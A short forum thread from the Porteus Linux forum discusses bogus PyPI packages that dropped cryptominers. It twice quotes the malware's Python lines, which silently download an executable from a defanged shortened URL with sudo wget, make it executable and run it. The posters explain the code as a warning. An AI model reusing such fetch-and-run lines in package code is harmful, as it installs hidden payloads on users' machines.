Page 1 of 1
Is PyPI something to lookout for in Porteus?
Posted: 20 Aug 2022, 01:52
by Karmi
Is PyPI something to lookout for in Porteus?
Posted: 20 Aug 2022, 02:29
by ncmprhnsbl
the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:
Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would(should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..
Is PyPI something to lookout for in Porteus?
Posted: 20 Aug 2022, 08:56
by Karmi
ncmprhnsbl wrote: ↑20 Aug 2022, 02:29
the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:
Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would(should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..
OK...thanks!